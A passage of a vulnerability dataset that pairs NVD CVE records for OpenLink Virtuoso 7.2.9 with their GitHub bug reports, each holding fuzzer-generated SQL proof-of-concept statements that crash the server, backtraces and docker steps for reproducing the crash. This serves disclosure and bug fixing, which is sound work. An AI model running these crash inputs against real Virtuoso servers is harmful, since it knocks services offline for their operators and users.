docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sqlc_union_dt_wrap | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1136/comments | 0 | 2023-04-12T19:34:10Z | 2023-04-14T08:12:15Z | https://github.com/openlink/virtuoso-opensource/issues/1136 | 1,665,129,009 | 1,136 | 5,137 |
CVE-2023-31619 | 2023-05-15T15:15:12.170 | An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1133"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1133"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1133 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x VARCHAR, k VARCHAR, v VARCHAR);
CREATE VIEW t1 AS SELECT x, x FROM t1;
UPDATE t1 SET x = x + 100;
```
backtrace:
```c
#0 0x6080d1 (sch_name_to_object+0x11)
#1 0x7dcf6f (sqlc_update_searched+0x6f)
#2 0x817cd1 (sqlc_update_view+0xaa1)
#3 0x7ddad0 (sqlc_update_searched+0xbd0)
#4 0x817cd1 (sqlc_update_view+0xaa1)
#5 0x7ddad0 (sqlc_update_searched+0xbd0)
#6 0x817cd1 (sqlc_update_view+0xaa1)
#7 0x7ddad0 (sqlc_update_searched+0xbd0)
#8 0x817cd1 (sqlc_update_view+0xaa1)
#9 0x7ddad0 (sqlc_update_searched+0xbd0)
#10 0x817cd1 (sqlc_update_view+0xaa1)
...
#2546 0x817cd1 (sqlc_update_view+0xaa1)
#2547 0x7ddad0 (sqlc_update_searched+0xbd0)
#2548 0x817cd1 (sqlc_update_view+0xaa1)
#2549 0x7ddad0 (sqlc_update_searched+0xbd0)
#2550 0x817cd1 (sqlc_update_view+0xaa1)
#2551 0x7ddad0 (sqlc_update_searched+0xbd0)
#2552 0x6b7212 (sql_stmt_comp+0x812)
#2553 0x6ba122 (sql_compile_1+0x1a62)
#2554 0x7c8cd0 (stmt_set_query+0x340)
#2555 0x7cabc2 (sf_sql_execute+0x922)
#2556 0x7cbf4e (sf_sql_execute_w+0x17e)
#2557 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#2558 0xe1f01c (future_wrapper+0x3fc)
#2559 0xe2691e (_thread_boot+0x11e)
#2560 0x7f5b7a921609 (start_thread+0xd9)
#2561 0x7f5b7a6f1133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sch_name_to_object | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1133/comments | 1 | 2023-04-12T19:26:23Z | 2023-04-14T08:41:03Z | https://github.com/openlink/virtuoso-opensource/issues/1133 | 1,665,120,116 | 1,133 | 5,138 |
CVE-2023-31620 | 2023-05-15T15:15:12.237 | An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1128"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1128"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1128 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE element (
name VARCHAR(80),
test1 VARCHAR(80),
f1 VARCHAR(80),
f2 VARCHAR(80),
code INTEGER,
t1 VARCHAR(80),
a VARCHAR(80),
example VARCHAR(80),
b VARCHAR(80),
c VARCHAR(80),
folders VARCHAR(80)
);
INSERT INTO element(b,b) VALUES(38,1444);
SELECT (select ( -count(distinct case case code when b then c*case when b<=element.b+b then code when (abs(element.c)/abs(case when b-coalesce((select max(element.c-element.b) from element where not exists(select 1 from element where 17 in (b,13,(b)) or b in (b,c,element.b))),element.b) not in (b,((c)),element.b) then -19 when c between code and 13 then 19 else element.c end))=13 then c else 13 end else 17 end when 13 then element.c else element.b end-element.c)) from element) FROM element WHERE coalesce((select max(element.b) from element where element.c<>element.c-13),element.code)>=b or b*coalesce((select max((b)) from element where c not between +coalesce((select max(13) from element where b between -(abs(( -coalesce((select max(case c when element.c then b else -element.c end) from element where 11>b and element.b<element.b),element.c)))/abs(b)) and b),code) and element.b),element.b)* -19 not between (17) and element.c and (element.b<=code);
```
backtrace:
```c
#0 0x60afab (dv_compare+0x3b)
#1 0xc278fb (cmp_vec_any+0x24b)
#2 0xc28caa (cmp_vec+0x12ba)
#3 0x751b48 (code_vec_run_v+0x1368)
#4 0x7ac72d (qn_send_output+0xbd)
#5 0x7ac43e (qn_input+0x3ce)
#6 0x7ac8a6 (qn_send_output+0x236)
#7 0x81e26d (set_ctr_vec_input+0x94d)
#8 0x7ac43e (qn_input+0x3ce)
#9 0x74f268 (subq_next+0x258)
#10 0x81cfa2 (ins_vec_subq+0x2a2)
#11 0x75119b (code_vec_run_v+0x9bb)
#12 0x7b5a9b (end_node_input+0x13b)
#13 0x7ac43e (qn_input+0x3ce)
#14 0x7acb6f (qn_ts_send_output+0x23f)
#15 0x7b247e (table_source_input+0x16ee)
#16 0x7ac43e (qn_input+0x3ce)
#17 0x7b9c3b (fun_ref_node_input+0x36b)
#18 0x7ac43e (qn_input+0x3ce)
#19 0x7ac8a6 (qn_send_output+0x236)
#20 0x81e26d (set_ctr_vec_input+0x94d)
#21 0x7ac43e (qn_input+0x3ce)
#22 0x74f268 (subq_next+0x258)
#23 0x81cfa2 (ins_vec_subq+0x2a2)
#24 0x75119b (code_vec_run_v+0x9bb)
#25 0x7b5a9b (end_node_input+0x13b)
#26 0x7ac43e (qn_input+0x3ce)
#27 0x7acb6f (qn_ts_send_output+0x23f)
#28 0x7b247e (table_source_input+0x16ee)
#29 0x7ac43e (qn_input+0x3ce)
#30 0x7b9c3b (fun_ref_node_input+0x36b)
#31 0x7ac43e (qn_input+0x3ce)
#32 0x7ac8a6 (qn_send_output+0x236)
#33 0x81e26d (set_ctr_vec_input+0x94d)
#34 0x7ac43e (qn_input+0x3ce)
#35 0x74f268 (subq_next+0x258)
#36 0x81cfa2 (ins_vec_subq+0x2a2)
#37 0x75119b (code_vec_run_v+0x9bb)
#38 0x7b5a9b (end_node_input+0x13b)
#39 0x7ac43e (qn_input+0x3ce)
#40 0x7acb6f (qn_ts_send_output+0x23f)
#41 0x7b247e (table_source_input+0x16ee)
#42 0x7ac43e (qn_input+0x3ce)
#43 0x7ac8a6 (qn_send_output+0x236)
#44 0x81e26d (set_ctr_vec_input+0x94d)
#45 0x7ac43e (qn_input+0x3ce)
#46 0x7bdc6e (qr_exec+0x11ee)
#47 0x7cb446 (sf_sql_execute+0x11a6)
#48 0x7cbf4e (sf_sql_execute_w+0x17e)
#49 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#50 0xe1f01c (future_wrapper+0x3fc)
#51 0xe2691e (_thread_boot+0x11e)
#52 0x7f731e31d609 (start_thread+0xd9)
#53 0x7f731e0ed133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at dv_compare | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1128/comments | 0 | 2023-04-12T19:03:51Z | 2023-04-17T18:53:42Z | https://github.com/openlink/virtuoso-opensource/issues/1128 | 1,665,092,932 | 1,128 | 5,139 |
CVE-2023-31621 | 2023-05-15T15:15:12.300 | An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1130"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1130"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1130 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE brin_test(a INTEGER NOT NULL);
INSERT INTO brin_test (a) VALUES(5);
INSERT INTO brin_test (a) VALUES(5);
ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ;
UPDATE brin_test SET a = a + 1 WHERE a = 5;
```
backtrace:
```c
#0 0x5cfed5 (kc_var_col+0x155)
#1 0x5f6cb6 (page_copy_col+0x666)
#2 0x5d6e62 (page_row_bm+0x782)
#3 0x5db6b0 (page_apply_1+0xb90)
#4 0x5dd8d9 (page_apply+0x119)
#5 0x86b517 (upd_refit_row+0x127)
#6 0x86ce54 (update_node_run_1+0xdf4)
#7 0x821736 (update_node_vec_run+0x836)
#8 0x86eaf2 (update_node_input+0x2b2)
#9 0x7ac43e (qn_input+0x3ce)
#10 0x7acb6f (qn_ts_send_output+0x23f)
#11 0x7b247e (table_source_input+0x16ee)
#12 0x7ac43e (qn_input+0x3ce)
#13 0x7ac8a6 (qn_send_output+0x236)
#14 0x81e26d (set_ctr_vec_input+0x94d)
#15 0x7ac43e (qn_input+0x3ce)
#16 0x7bee59 (qr_dml_array_exec+0x839)
#17 0x7cb872 (sf_sql_execute+0x15d2)
#18 0x7cbf4e (sf_sql_execute_w+0x17e)
#19 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#20 0xe1f01c (future_wrapper+0x3fc)
#21 0xe2691e (_thread_boot+0x11e)
#22 0x7f2e9644f609 (start_thread+0xd9)
#23 0x7f2e9621f133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at kc_var_col | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1130/comments | 0 | 2023-04-12T19:18:19Z | 2023-04-14T12:55:17Z | https://github.com/openlink/virtuoso-opensource/issues/1130 | 1,665,110,745 | 1,130 | 5,140 |
CVE-2023-31622 | 2023-05-15T15:15:12.347 | An issue in the sqlc_make_policy_trig component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1135"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1135 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
DELETE FROM ucview WHERE CURRENT OF c1;
```
backtrace:
```c
#0 0x7d8904 (sqlc_make_policy_trig+0x54)
#1 0x7ddf99 (sqlc_delete_pos+0x2e9)
#2 0x6b6e53 (sql_stmt_comp+0x453)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x7c8cd0 (stmt_set_query+0x340)
#5 0x7cabc2 (sf_sql_execute+0x922)
#6 0x7cbf4e (sf_sql_execute_w+0x17e)
#7 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#8 0xe1f01c (future_wrapper+0x3fc)
#9 0xe2691e (_thread_boot+0x11e)
#10 0x7faabf70f609 (start_thread+0xd9)
#11 0x7faabf4df133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sqlc_make_policy_trig | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1135/comments | 0 | 2023-04-12T19:32:30Z | 2023-04-14T08:12:14Z | https://github.com/openlink/virtuoso-opensource/issues/1135 | 1,665,127,014 | 1,135 | 5,141 |
CVE-2023-31623 | 2023-05-15T15:15:12.390 | An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1131"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1131"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1131 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(
x INTEGER PRIMARY KEY,
k VARCHAR
);
CREATE VIEW t1 AS SELECT k, k FROM t1;
UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128;
```
backtrace:
```c
#0 0xe086e9 (mp_box_copy+0x9)
#1 0xe08dd0 (mp_box_copy_tree+0xc0)
#2 0x815b3a (sqlc_col_to_view_scope+0x4fa)
#3 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#4 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#5 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#6 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#7 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#8 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#9 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#10 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#11 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#12 0x815ee2 (sqlc_exp_to_view_scope+0x162)
...
#1045 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#1046 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#1047 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#1048 0x817c90 (sqlc_update_view+0xa60)
#1049 0x7ddad0 (sqlc_update_searched+0xbd0)
#1050 0x817cd1 (sqlc_update_view+0xaa1)
#1051 0x7ddad0 (sqlc_update_searched+0xbd0)
#1052 0x817cd1 (sqlc_update_view+0xaa1)
#1053 0x7ddad0 (sqlc_update_searched+0xbd0)
#1054 0x817cd1 (sqlc_update_view+0xaa1)
#1055 0x7ddad0 (sqlc_update_searched+0xbd0)
#1056 0x817cd1 (sqlc_update_view+0xaa1)
...
#3132 0x817cd1 (sqlc_update_view+0xaa1)
#3133 0x7ddad0 (sqlc_update_searched+0xbd0)
#3134 0x817cd1 (sqlc_update_view+0xaa1)
#3135 0x7ddad0 (sqlc_update_searched+0xbd0)
#3136 0x6b7212 (sql_stmt_comp+0x812)
#3137 0x6ba122 (sql_compile_1+0x1a62)
#3138 0x7c8cd0 (stmt_set_query+0x340)
#3139 0x7cabc2 (sf_sql_execute+0x922)
#3140 0x7cbf4e (sf_sql_execute_w+0x17e)
#3141 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#3142 0xe1f01c (future_wrapper+0x3fc)
#3143 0xe2691e (_thread_boot+0x11e)
#3144 0x7f2025e0d609 (start_thread+0xd9)
#3145 0x7f2025bdd133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at mp_box_copy | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1131/comments | 1 | 2023-04-12T19:21:09Z | 2023-04-14T08:41:41Z | https://github.com/openlink/virtuoso-opensource/issues/1131 | 1,665,114,015 | 1,131 | 5,142 |
CVE-2023-31624 | 2023-05-15T15:15:12.437 | An issue in the sinv_check_exp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1134"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1134"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1134 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE base_tbl (a int, b int);
CREATE VIEW rw_view1 AS SELECT * FROM base_tbl;
INSERT INTO rw_view1 VALUES (15);
```
backtrace:
```c
#0 0x788dc0 (sinv_check_exp+0x120)
#1 0x78a03d (sinv_sqlo_check_col_val+0xad)
#2 0x816d50 (sqlc_insert_view+0x330)
#3 0x6b7387 (sql_stmt_comp+0x987)
#4 0x6ba122 (sql_compile_1+0x1a62)
#5 0x7c8cd0 (stmt_set_query+0x340)
#6 0x7cabc2 (sf_sql_execute+0x922)
#7 0x7cbf4e (sf_sql_execute_w+0x17e)
#8 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#9 0xe1f01c (future_wrapper+0x3fc)
#10 0xe2691e (_thread_boot+0x11e)
#11 0x7fbc8904b609 (start_thread+0xd9)
#12 0x7fbc88e1b133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
